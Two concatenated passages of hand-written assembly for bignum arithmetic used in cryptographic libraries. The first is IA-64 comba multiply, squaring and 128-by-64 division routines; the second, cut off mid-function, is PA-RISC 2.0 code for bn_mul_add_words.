// with getf.sig, add them with explicit carry tracking, and store
// r[7] through r[15].
{ .mii; getf.sig r31=f47
add r25=r25,r24
mov carry1=0 };;
{ .mii; getf.sig r16=f111
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r17=f102 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r28=r28,r27 };;
{ .mii; getf.sig r18=f93
add r17=r17,r16
mov carry3=0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,r27
add r29=r29,r28 };;
{ .mii; getf.sig r19=f84
cmp.ltu p7,p0=r17,r16 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r29,r28
add r30=r30,r29 };;
{ .mii; getf.sig r20=f75
add r18=r18,r17 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r30,r29
add r31=r31,r30 };;
{ .mfb; getf.sig r21=f66 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 }
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r31,r30
add r31=r31,carry2 };;
{ .mfb; getf.sig r22=f57 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r19,r18
add r20=r20,r19 }
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r31,carry2 };;
{ .mfb; getf.sig r23=f48 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r20,r19
add r21=r21,r20 }
{ .mii;
(p6) add carry1=1,carry1 }
{ .mfb; st8 [r33]=r31,16 };; // store r[7]
{ .mfb; getf.sig r24=f112 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r21,r20
add r22=r22,r21 };;
{ .mfb; getf.sig r25=f103 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r22,r21
add r23=r23,r22 };;
{ .mfb; getf.sig r26=f94 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r23,r22
add r23=r23,carry1 };;
{ .mfb; getf.sig r27=f85 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p8=r23,carry1};;
{ .mii; getf.sig r28=f76
add r25=r25,r24
mov carry1=0 }
{ .mii; st8 [r32]=r23,16 // store r[8]
(p7) add carry2=1,carry3
(p8) add carry2=0,carry3 };;
{ .mfb; nop.m 0x0 }
{ .mii; getf.sig r29=f67
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r30=f58 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mfb; getf.sig r16=f113 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r28=r28,r27 };;
{ .mfb; getf.sig r17=f104 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,r27
add r29=r29,r28 };;
{ .mfb; getf.sig r18=f95 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r29,r28
add r30=r30,r29 };;
{ .mii; getf.sig r19=f86
add r17=r17,r16
mov carry3=0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r30,r29
add r30=r30,carry2 };;
{ .mii; getf.sig r20=f77
cmp.ltu p7,p0=r17,r16
add r18=r18,r17 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r30,carry2 };;
{ .mfb; getf.sig r21=f68 }
{ .mii; st8 [r33]=r30,16 // store r[9]
(p6) add carry1=1,carry1 };;
{ .mfb; getf.sig r24=f114 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 };;
{ .mfb; getf.sig r25=f105 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r19,r18
add r20=r20,r19 };;
{ .mfb; getf.sig r26=f96 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r20,r19
add r21=r21,r20 };;
{ .mfb; getf.sig r27=f87 }
{ .mii; (p7) add carry3=1,carry3
cmp.ltu p7,p0=r21,r20
add r21=r21,carry1 };;
{ .mib; getf.sig r28=f78
add r25=r25,r24 }
{ .mib; (p7) add carry3=1,carry3
cmp.ltu p7,p8=r21,carry1};;
{ .mii; st8 [r32]=r21,16 // store r[10]
(p7) add carry2=1,carry3
(p8) add carry2=0,carry3 }
{ .mii; mov carry1=0
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r16=f115 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mfb; getf.sig r17=f106 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r28=r28,r27 };;
{ .mfb; getf.sig r18=f97 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,r27
add r28=r28,carry2 };;
{ .mib; getf.sig r19=f88
add r17=r17,r16 }
{ .mib;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r28,carry2 };;
{ .mii; st8 [r33]=r28,16 // store r[11]
(p6) add carry1=1,carry1 }
{ .mii; mov carry2=0
cmp.ltu p7,p0=r17,r16
add r18=r18,r17 };;
{ .mfb; getf.sig r24=f116 }
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 };;
{ .mfb; getf.sig r25=f107 }
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,r18
add r19=r19,carry1 };;
{ .mfb; getf.sig r26=f98 }
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,carry1};;
{ .mii; st8 [r32]=r19,16 // store r[12]
(p7) add carry2=1,carry2 }
{ .mfb; add r25=r25,r24 };;
{ .mfb; getf.sig r16=f117 }
{ .mii; mov carry1=0
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mfb; getf.sig r17=f108 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r26=r26,carry2 };;
{ .mfb; nop.m 0x0 }
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,carry2 };;
{ .mii; st8 [r33]=r26,16 // store r[13]
(p6) add carry1=1,carry1 }
{ .mfb; add r17=r17,r16 };;
{ .mfb; getf.sig r24=f118 }
{ .mii; mov carry2=0
cmp.ltu p7,p0=r17,r16
add r17=r17,carry1 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r17,carry1};;
{ .mii; st8 [r32]=r17 // store r[14]
(p7) add carry2=1,carry2 };;
{ .mfb; add r24=r24,carry2 };;
{ .mib; st8 [r33]=r24 } // store r[15]
{ .mib; rum 1<<5 // clear um.mfh
br.ret.sptk.many b0 };;
.endp bn_mul_comba8#
#undef carry3
#undef carry2
#undef carry1
#endif
#if 1
// It's possible to make it faster (see comment to bn_sqr_comba8), but
// I reckon it isn't worth the effort. Basically because the routine
// (actually both of them) practically never called... So I just play
// same trick as with bn_sqr_comba8.
//
// void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
//
// Duplicates the 'a' pointer into the 'b' slots and tail-branches
// into bn_mul_comba4's cheat entry point, i.e.
// bn_sqr_comba4(r,a) == bn_mul_comba4(r,a,a).
.global bn_sqr_comba4#
.proc bn_sqr_comba4#
.align 64
bn_sqr_comba4:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,2,1,0,0
addp4 r32=0,r32 // HP-UX ILP32: widen 32-bit pointers
addp4 r33=0,r33 };;
{ .mii;
#else
{ .mii; alloc r2=ar.pfs,2,1,0,0
#endif
mov r34=r33 // b = a
add r14=8,r33 };; // a+8
.body
{ .mii; add r17=8,r34 // b+8
add r15=16,r33 // a+16
add r18=16,r34 } // b+16
{ .mfb; add r16=24,r33 // a+24 (r19=b+24 set at entry point)
br .L_cheat_entry_point4 };; // fall into bn_mul_comba4
.endp bn_sqr_comba4#
#endif
#if 1
// Runs in ~115 cycles and ~4.5 times faster than C. Well, whatever...
//
// void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
//
// Column-wise (comba) 4x4-word multiply: r[0..7] = a[0..3] * b[0..3].
// Same scheme as bn_mul_comba8: all 16 partial products go through
// pipelined xma.hu/xma.lu pairs, then column sums are finished in the
// integer ALU with carries tracked in carry1/carry2.
#define carry1 r14
#define carry2 r15
.global bn_mul_comba4#
.proc bn_mul_comba4#
.align 64
bn_mul_comba4:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,3,0,0,0
addp4 r33=0,r33 // HP-UX ILP32: widen 32-bit pointers
addp4 r34=0,r34 };;
{ .mii; addp4 r32=0,r32
#else
{ .mii; alloc r2=ar.pfs,3,0,0,0
#endif
add r14=8,r33 // a+1
add r17=8,r34 } // b+1
.body
{ .mii; add r15=16,r33 // a+2
add r18=16,r34 // b+2
add r16=24,r33 };; // a+3
.L_cheat_entry_point4: // entered from bn_sqr_comba4 with b:=a
{ .mmi; add r19=24,r34 // b+3
ldf8 f32=[r33] } // a[0]
{ .mmi; ldf8 f120=[r34] // b[0]
ldf8 f121=[r17] };; // b[1]
{ .mmi; ldf8 f122=[r18] // b[2]
ldf8 f123=[r19] } // b[3]
{ .mmi; ldf8 f33=[r14] // a[1]
ldf8 f34=[r15] } // a[2]
{ .mfi; ldf8 f35=[r16] // a[3]
xma.hu f41=f32,f120,f0 } // a[0]*b[0..3]
{ .mfi; xma.lu f40=f32,f120,f0 };;
{ .mfi; xma.hu f51=f32,f121,f0 }
{ .mfi; xma.lu f50=f32,f121,f0 };;
{ .mfi; xma.hu f61=f32,f122,f0 }
{ .mfi; xma.lu f60=f32,f122,f0 };;
{ .mfi; xma.hu f71=f32,f123,f0 }
{ .mfi; xma.lu f70=f32,f123,f0 };;//
// Major stall takes place here, and 3 more places below. Result from
// first xma is not available for another 3 ticks.
{ .mfi; getf.sig r16=f40 // r[0]
xma.hu f42=f33,f120,f41 // a[1]*b[0..3] folded with prior highs
add r33=8,r32 }
{ .mfi; xma.lu f41=f33,f120,f41 };;
{ .mfi; getf.sig r24=f50
xma.hu f52=f33,f121,f51 }
{ .mfi; xma.lu f51=f33,f121,f51 };;
{ .mfi; st8 [r32]=r16,16 // store r[0]
xma.hu f62=f33,f122,f61 }
{ .mfi; xma.lu f61=f33,f122,f61 };;
{ .mfi; xma.hu f72=f33,f123,f71 }
{ .mfi; xma.lu f71=f33,f123,f71 };;//
//-------------------------------------------------//
// Column 1: sum partials for r[1] while launching a[2]*b[0..3].
{ .mfi; getf.sig r25=f41
xma.hu f43=f34,f120,f42 }
{ .mfi; xma.lu f42=f34,f120,f42 };;
{ .mfi; getf.sig r16=f60
xma.hu f53=f34,f121,f52 }
{ .mfi; xma.lu f52=f34,f121,f52 };;
{ .mfi; getf.sig r17=f51
xma.hu f63=f34,f122,f62
add r25=r25,r24 }
{ .mfi; mov carry1=0
xma.lu f62=f34,f122,f62 };;
{ .mfi; st8 [r33]=r25,16 // store r[1]
xma.hu f73=f34,f123,f72
cmp.ltu p6,p0=r25,r24 }
{ .mfi; xma.lu f72=f34,f123,f72 };;//
//-------------------------------------------------//
// Column 2: sum partials for r[2] while launching a[3]*b[0..3]
// (the last multiplier row).
{ .mfi; getf.sig r18=f42
xma.hu f44=f35,f120,f43
(p6) add carry1=1,carry1 }
{ .mfi; add r17=r17,r16
xma.lu f43=f35,f120,f43
mov carry2=0 };;
{ .mfi; getf.sig r24=f70
xma.hu f54=f35,f121,f53
cmp.ltu p7,p0=r17,r16 }
{ .mfi; xma.lu f53=f35,f121,f53 };;
{ .mfi; getf.sig r25=f61
xma.hu f64=f35,f122,f63
add r18=r18,r17 }
{ .mfi; xma.lu f63=f35,f122,f63
(p7) add carry2=1,carry2 };;
{ .mfi; getf.sig r26=f52
xma.hu f74=f35,f123,f73
cmp.ltu p7,p0=r18,r17 }
{ .mfi; xma.lu f73=f35,f123,f73
add r18=r18,carry1 };;
//-------------------------------------------------//
// Integer-only phase: drain remaining column sums and store r[2..7].
{ .mii; st8 [r32]=r18,16 // store r[2]
(p7) add carry2=1,carry2
cmp.ltu p7,p0=r18,carry1 };;
{ .mfi; getf.sig r27=f43 // last major stall
(p7) add carry2=1,carry2 };;
{ .mii; getf.sig r16=f71
add r25=r25,r24
mov carry1=0 };;
{ .mii; getf.sig r17=f62
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r27=r27,r26 };;
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,r26
add r27=r27,carry2 };;
{ .mii; getf.sig r18=f53
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r27,carry2 };;
{ .mfi; st8 [r33]=r27,16 // store r[3]
(p6) add carry1=1,carry1 }
{ .mii; getf.sig r19=f44
add r17=r17,r16
mov carry2=0 };;
{ .mii; getf.sig r24=f72
cmp.ltu p7,p0=r17,r16
add r18=r18,r17 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r18,r17
add r19=r19,r18 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,r18
add r19=r19,carry1 };;
{ .mii; getf.sig r25=f63
(p7) add carry2=1,carry2
cmp.ltu p7,p0=r19,carry1};;
{ .mii; st8 [r32]=r19,16 // store r[4]
(p7) add carry2=1,carry2 }
{ .mii; getf.sig r26=f54
add r25=r25,r24
mov carry1=0 };;
{ .mii; getf.sig r16=f73
cmp.ltu p6,p0=r25,r24
add r26=r26,r25 };;
{ .mii;
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,r25
add r26=r26,carry2 };;
{ .mii; getf.sig r17=f64
(p6) add carry1=1,carry1
cmp.ltu p6,p0=r26,carry2 };;
{ .mii; st8 [r33]=r26,16 // store r[5]
(p6) add carry1=1,carry1 }
{ .mii; getf.sig r24=f74
add r17=r17,r16
mov carry2=0 };;
{ .mii; cmp.ltu p7,p0=r17,r16
add r17=r17,carry1 };;
{ .mii; (p7) add carry2=1,carry2
cmp.ltu p7,p0=r17,carry1};;
{ .mii; st8 [r32]=r17,16 // store r[6]
(p7) add carry2=1,carry2 };;
{ .mii; add r24=r24,carry2 };;
{ .mii; st8 [r33]=r24 } // store r[7]
{ .mib; rum 1<<5 // clear um.mfh
br.ret.sptk.many b0 };;
.endp bn_mul_comba4#
#undef carry2
#undef carry1
#endif
#if 1
//
// BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d)
//
// Returns the 64-bit quotient of the 128-bit value h:l divided by d
// (callers guarantee h < d so the quotient fits; d == 0 returns ~0).
// Strategy: normalize d so its top bit is set, then produce the
// quotient 32 bits at a time. Each half uses the FP reciprocal-based
// 64/32-bit divide kernel .L_udiv64_32_b6 for an estimate, followed
// by an integer correction loop (.L_divw_*_iter).
//
// In the nutshell it's a port of my MIPS III/IV implementation.
//
#define AT r14
#define H r16
#define HH r20
#define L r17
#define D r18
#define DH r22
#define I r21
#if 0
// Some preprocessors (most notably HP-UX) appear to be allergic to
// macros enclosed to parenthesis [as these three were].
#define cont p16
#define break p0 // p20
#define equ p24
#else
cont=p16
break=p0
equ=p24
#endif
.global abort#
.global bn_div_words#
.proc bn_div_words#
.align 64
bn_div_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,3,5,0,8
.save b0,r3
mov r3=b0
.save pr,r10
mov r10=pr };;
{ .mmb; cmp.eq p6,p0=r34,r0 // d == 0?
mov r8=-1 // division by zero returns all-ones
(p6) br.ret.spnt.many b0 };;
.body
{ .mii; mov H=r32 // save h
mov ar.ec=0 // don't rotate at exit
mov pr.rot=0 }
{ .mii; mov L=r33 // save l
mov r36=r0 };; // shift count I starts at 0
// Normalize: shift d left until its sign bit is set, counting shifts.
.L_divw_shift: // -vv- note signed comparison
{ .mfi; (p0) cmp.lt p16,p0=r0,r34 // d
(p0) shladd r33=r34,1,r0 }
{ .mfb; (p0) add r35=1,r36
(p0) nop.f 0x0
(p16) br.wtop.dpnt .L_divw_shift };;
{ .mii; mov D=r34 // normalized divisor
shr.u DH=r34,32 // its high 32 bits
sub r35=64,r36 };; // 64 - shift
{ .mii; setf.sig f7=DH
shr.u AT=H,r35
mov I=r36 };; // remember shift for the remainder
{ .mib; cmp.ne p6,p0=r0,AT // would shifting h lose bits?
shl H=H,r36
(p6) br.call.spnt.clr b0=abort };; // overflow, die...
{ .mfi; fcvt.xuf.s1 f7=f7 // (double)DH for the divide kernel
shr.u AT=L,r35 };;
{ .mii; shl L=L,r36 // shift l, feeding its top bits into h
or H=H,AT };;
{ .mii; nop.m 0x0
cmp.leu p6,p0=D,H;;
(p6) sub H=H,D } // pre-subtract so H < D
{ .mlx; setf.sig f14=D
movl AT=0xffffffff };; // saturation value for q estimate
///////////////////////////////////////////////////////////
// First 32-bit quotient digit.
{ .mii; setf.sig f6=H
shr.u HH=H,32;;
cmp.eq p6,p7=HH,DH };; // hi halves equal => estimate saturates
{ .mfb;
(p6) setf.sig f8=AT // q estimate = 0xffffffff
(p7) fcvt.xuf.s1 f6=f6
(p7) br.call.sptk b6=.L_udiv64_32_b6 };;
{ .mfi; getf.sig r33=f8 // q
xmpy.lu f9=f8,f14 } // q*D, low
{ .mfi; xmpy.hu f10=f8,f14 // q*D, high
shrp H=H,L,32 };; // slide next 32 bits of L into H
{ .mmi; getf.sig r35=f9 // tl
getf.sig r31=f10 };; // th
// Correct the estimate downwards until q*D <= H (at most a few steps).
.L_divw_1st_iter:
{ .mii; (p0) add r32=-1,r33
(p0) cmp.eq equ,cont=HH,r31 };;
{ .mii; (p0) cmp.ltu p8,p0=r35,D
(p0) sub r34=r35,D
(equ) cmp.leu break,cont=r35,H };;
{ .mib; (cont) cmp.leu cont,break=HH,r31
(p8) add r31=-1,r31
(cont) br.wtop.spnt .L_divw_1st_iter };;
///////////////////////////////////////////////////////////
{ .mii; sub H=H,r35 // remainder after first digit
shl r8=r33,32 // high quotient digit into place
shl L=L,32 };;
///////////////////////////////////////////////////////////
// Second 32-bit quotient digit (same scheme as the first).
{ .mii; setf.sig f6=H
shr.u HH=H,32;;
cmp.eq p6,p7=HH,DH };;
{ .mfb;
(p6) setf.sig f8=AT
(p7) fcvt.xuf.s1 f6=f6
(p7) br.call.sptk b6=.L_udiv64_32_b6 };;
{ .mfi; getf.sig r33=f8 // q
xmpy.lu f9=f8,f14 }
{ .mfi; xmpy.hu f10=f8,f14
shrp H=H,L,32 };;
{ .mmi; getf.sig r35=f9 // tl
getf.sig r31=f10 };; // th
.L_divw_2nd_iter:
{ .mii; (p0) add r32=-1,r33
(p0) cmp.eq equ,cont=HH,r31 };;
{ .mii; (p0) cmp.ltu p8,p0=r35,D
(p0) sub r34=r35,D
(equ) cmp.leu break,cont=r35,H };;
{ .mib; (cont) cmp.leu cont,break=HH,r31
(p8) add r31=-1,r31
(cont) br.wtop.spnt .L_divw_2nd_iter };;
///////////////////////////////////////////////////////////
{ .mii; sub H=H,r35
or r8=r8,r33 // combine both quotient digits
mov ar.pfs=r2 };;
{ .mii; shr.u r9=H,I // remainder if anybody wants it
mov pr=r10,0x1ffff } // restore caller's predicates
{ .mfb; br.ret.sptk.many b0 };;
// Unsigned 64 by 32 (well, by 64 for the moment) bit integer division
// procedure.
//
// inputs: f6 = (double)a, f7 = (double)b
// output: f8 = (int)(a/b)
// clobbered: f8,f9,f10,f11,pred
pred=p15
// One can argue that this snippet is copyrighted to Intel
// Corporation, as it's essentially identical to one of those
// found in "Divide, Square Root and Remainder" section at
// http://www.intel.com/software/products/opensource/libraries/num.htm.
// Yes, I admit that the referred code was used as template,
// but after I realized that there hardly is any other instruction
// sequence which would perform this operation. I mean I figure that
// any independent attempt to implement high-performance division
// will result in code virtually identical to the Intel code. It
// should be noted though that below division kernel is 1 cycle
// faster than Intel one (note commented splits:-), not to mention
// original prologue (rather lack of one) and epilogue.
// Newton-Raphson refinement of frcpa's initial reciprocal estimate.
.align 32
.skip 16
.L_udiv64_32_b6:
frcpa.s1 f8,pred=f6,f7;; // [0] y0 = 1 / b
(pred) fnma.s1 f9=f7,f8,f1 // [5] e0 = 1 - b * y0
(pred) fmpy.s1 f10=f6,f8;; // [5] q0 = a * y0
(pred) fmpy.s1 f11=f9,f9 // [10] e1 = e0 * e0
(pred) fma.s1 f10=f9,f10,f10;; // [10] q1 = q0 + e0 * q0
(pred) fma.s1 f8=f9,f8,f8 //;; // [15] y1 = y0 + e0 * y0
(pred) fma.s1 f9=f11,f10,f10;; // [15] q2 = q1 + e1 * q1
(pred) fma.s1 f8=f11,f8,f8 //;; // [20] y2 = y1 + e1 * y1
(pred) fnma.s1 f10=f7,f9,f6;; // [20] r2 = a - b * q2
(pred) fma.s1 f8=f10,f8,f9;; // [25] q3 = q2 + r2 * y2
fcvt.fxu.trunc.s1 f8=f8 // [30] q = trunc(q3)
br.ret.sptk.many b6;;
.endp bn_div_words#
#endif
|
AIFM-sys/AIFM
| 46,674
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/pa-risc2W.s
|
;
; PA-RISC 64-bit implementation of bn_asm code
;
; This code is approximately 2x faster than the C version
; for RSA/DSA.
;
; See http://devresource.hp.com/ for more details on the PA-RISC
; architecture. Also see the book "PA-RISC 2.0 Architecture"
; by Gerry Kane for information on the instruction set architecture.
;
; Code written by Chris Ruemmler (with some help from the HP C
; compiler).
;
; The code compiles with HP's assembler
;
.level 2.0W
.space $TEXT$
.subspa $CODE$,QUAD=0,ALIGN=8,ACCESS=0x2c,CODE_ONLY
;
; Global Register definitions used for the routines.
;
; Some information about HP's runtime architecture for 64-bits.
;
; "Caller save" means the calling function must save the register
; if it wants the register to be preserved.
; "Callee save" means if a function uses the register, it must save
; the value before using it.
;
; For the floating point registers
;
; "caller save" registers: fr4-fr11, fr22-fr31
; "callee save" registers: fr12-fr21
; "special" registers: fr0-fr3 (status and exception registers)
;
; For the integer registers
; value zero : r0
; "caller save" registers: r1,r19-r26
; "callee save" registers: r3-r18
; return register : r2 (rp)
; return values ; r28 (ret0,ret1)
; Stack pointer ; r30 (sp)
; global data pointer ; r27 (dp)
; argument pointer ; r29 (ap)
; millicode return ptr ; r31 (also a caller save register)
;
; Arguments to the routines
;
r_ptr .reg %r26
a_ptr .reg %r25
b_ptr .reg %r24
num .reg %r24
w .reg %r23
n .reg %r23
;
; Globals used in some routines
;
top_overflow .reg %r29
high_mask .reg %r22 ; value 0xffffffff80000000L
;------------------------------------------------------------------------------
;
; bn_mul_add_words
;
;BN_ULONG bn_mul_add_words(BN_ULONG *r_ptr, BN_ULONG *a_ptr,
;	int num, BN_ULONG w)
;
; Computes r[i] += a[i] * w for i in [0, num) and returns the final
; 64-bit carry in %ret0 (returns 0 immediately when num <= 0).
;
; Each 64x64->128 multiply is synthesized from four 32x32 XMPYU partial
; products in the FP unit; operands move between the FP and integer
; register files through the stack frame, since PA-RISC 2.0 has no
; direct FP<->GR move instruction.  The main loop is unrolled twice.
;
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = num
; arg3 = w
;
; Local register definitions
;
fm1          .reg %fr22	; high partial product a_hi * w_lo
fm           .reg %fr23	; mid partial product  a_lo * w_hi
ht_temp      .reg %fr24	; high product         a_hi * w_hi
ht_temp_1    .reg %fr25
lt_temp      .reg %fr26	; low product          a_lo * w_lo
lt_temp_1    .reg %fr27
fm1_1        .reg %fr28
fm_1         .reg %fr29
fw_h         .reg %fr7L
fw_l         .reg %fr7R
fw           .reg %fr7
fht_0        .reg %fr8L
flt_0        .reg %fr8R
t_float_0    .reg %fr8
fht_1        .reg %fr9L
flt_1        .reg %fr9R
t_float_1    .reg %fr9
tmp_0        .reg %r31
tmp_1        .reg %r21
m_0          .reg %r20
m_1          .reg %r19
ht_0         .reg %r1
ht_1         .reg %r3
lt_0         .reg %r4
lt_1         .reg %r5
m1_0         .reg %r6
m1_1         .reg %r7
rp_val       .reg %r8
rp_val_1     .reg %r9

bn_mul_add_words
	.export	bn_mul_add_words,entry,NO_RELOCATION,LONG_RETURN
	.proc
	.callinfo frame=128
	.entry
	.align 64
	STD	%r3,0(%sp)		; save r3
	STD	%r4,8(%sp)		; save r4
	NOP				; Needed to make the loop 16-byte aligned
	NOP				; Needed to make the loop 16-byte aligned
	STD	%r5,16(%sp)		; save r5
	STD	%r6,24(%sp)		; save r6
	STD	%r7,32(%sp)		; save r7
	STD	%r8,40(%sp)		; save r8
	STD	%r9,48(%sp)		; save r9
	COPY	%r0,%ret0		; return 0 by default
	DEPDI,Z	1,31,1,top_overflow	; top_overflow = 1 << 32
	STD	w,56(%sp)		; store w on stack so it can be FLDDed below
	CMPIB,>=	0,num,bn_mul_add_words_exit	; if (num <= 0) then exit
	LDO	128(%sp),%sp		; bump stack
	;
	; The loop is unrolled twice, so if there is only 1 number
	; then go straight to the cleanup code.
	;
	CMPIB,=	1,num,bn_mul_add_words_single_top
	FLDD	-72(%sp),fw	; load up w into fp register fw (fw_h/fw_l)
				; (-72 = 56 before the 128-byte stack bump)
	;
	; This loop is unrolled 2 times (64-byte aligned as well)
	;
	; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
	; two 32-bit mutiplies can be issued per cycle.
	;
bn_mul_add_words_unroll2
	FLDD	0(a_ptr),t_float_0	; load up 64-bit value (fr8L) ht(L)/lt(R)
	FLDD	8(a_ptr),t_float_1	; load up 64-bit value (fr8L) ht(L)/lt(R)
	LDD	0(r_ptr),rp_val		; rp[0]
	LDD	8(r_ptr),rp_val_1	; rp[1]
	XMPYU	fht_0,fw_l,fm1		; m1[0] = fht_0*fw_l
	XMPYU	fht_1,fw_l,fm1_1	; m1[1] = fht_1*fw_l
	FSTD	fm1,-16(%sp)		; -16(sp) = m1[0]
	FSTD	fm1_1,-48(%sp)		; -48(sp) = m1[1]
	XMPYU	flt_0,fw_h,fm		; m[0] = flt_0*fw_h
	XMPYU	flt_1,fw_h,fm_1		; m[1] = flt_1*fw_h
	FSTD	fm,-8(%sp)		; -8(sp) = m[0]
	FSTD	fm_1,-40(%sp)		; -40(sp) = m[1]
	XMPYU	fht_0,fw_h,ht_temp	; ht_temp = fht_0*fw_h
	XMPYU	fht_1,fw_h,ht_temp_1	; ht_temp_1 = fht_1*fw_h
	FSTD	ht_temp,-24(%sp)	; -24(sp) = ht_temp
	FSTD	ht_temp_1,-56(%sp)	; -56(sp) = ht_temp_1
	XMPYU	flt_0,fw_l,lt_temp	; lt_temp = lt*fw_l
	XMPYU	flt_1,fw_l,lt_temp_1	; lt_temp = lt*fw_l
	FSTD	lt_temp,-32(%sp)	; -32(sp) = lt_temp
	FSTD	lt_temp_1,-64(%sp)	; -64(sp) = lt_temp_1
	LDD	-8(%sp),m_0		; m[0]
	LDD	-40(%sp),m_1		; m[1]
	LDD	-16(%sp),m1_0		; m1[0]
	LDD	-48(%sp),m1_1		; m1[1]
	LDD	-24(%sp),ht_0		; ht[0]
	LDD	-56(%sp),ht_1		; ht[1]
	ADD,L	m1_0,m_0,tmp_0		; tmp_0 = m[0] + m1[0];
	ADD,L	m1_1,m_1,tmp_1		; tmp_1 = m[1] + m1[1];
	LDD	-32(%sp),lt_0
	LDD	-64(%sp),lt_1
	CMPCLR,*>>=	tmp_0,m1_0, %r0	; if (m[0] < m1[0])
	ADD,L	ht_0,top_overflow,ht_0	; ht[0] += (1<<32)
	CMPCLR,*>>=	tmp_1,m1_1,%r0	; if (m[1] < m1[1])
	ADD,L	ht_1,top_overflow,ht_1	; ht[1] += (1<<32)
	EXTRD,U	tmp_0,31,32,m_0		; m[0]>>32
	DEPD,Z	tmp_0,31,32,m1_0	; m1[0] = m[0]<<32
	EXTRD,U	tmp_1,31,32,m_1		; m[1]>>32
	DEPD,Z	tmp_1,31,32,m1_1	; m1[1] = m[1]<<32
	ADD,L	ht_0,m_0,ht_0		; ht[0]+= (m[0]>>32)
	ADD,L	ht_1,m_1,ht_1		; ht[1]+= (m[1]>>32)
	ADD	lt_0,m1_0,lt_0		; lt[0] = lt[0]+m1[0];
	ADD,DC	ht_0,%r0,ht_0		; ht[0]++
	ADD	lt_1,m1_1,lt_1		; lt[1] = lt[1]+m1[1];
	ADD,DC	ht_1,%r0,ht_1		; ht[1]++
	ADD	%ret0,lt_0,lt_0		; lt[0] = lt[0] + c;
	ADD,DC	ht_0,%r0,ht_0		; ht[0]++
	ADD	lt_0,rp_val,lt_0	; lt[0] = lt[0]+rp[0]
	ADD,DC	ht_0,%r0,ht_0		; ht[0]++
	LDO	-2(num),num		; num = num - 2;
	ADD	ht_0,lt_1,lt_1		; lt[1] = lt[1] + ht_0 (c);
	ADD,DC	ht_1,%r0,ht_1		; ht[1]++
	STD	lt_0,0(r_ptr)		; rp[0] = lt[0]
	ADD	lt_1,rp_val_1,lt_1	; lt[1] = lt[1]+rp[1]
	ADD,DC	ht_1,%r0,%ret0		; ht[1]++; carry out for next iteration
	LDO	16(a_ptr),a_ptr		; a_ptr += 2
	STD	lt_1,8(r_ptr)		; rp[1] = lt[1]
	CMPIB,<=	2,num,bn_mul_add_words_unroll2 ; go again if more to do
	LDO	16(r_ptr),r_ptr		; r_ptr += 2 (delay slot)
	CMPIB,=,N	0,num,bn_mul_add_words_exit ; are we done, or cleanup last one
	;
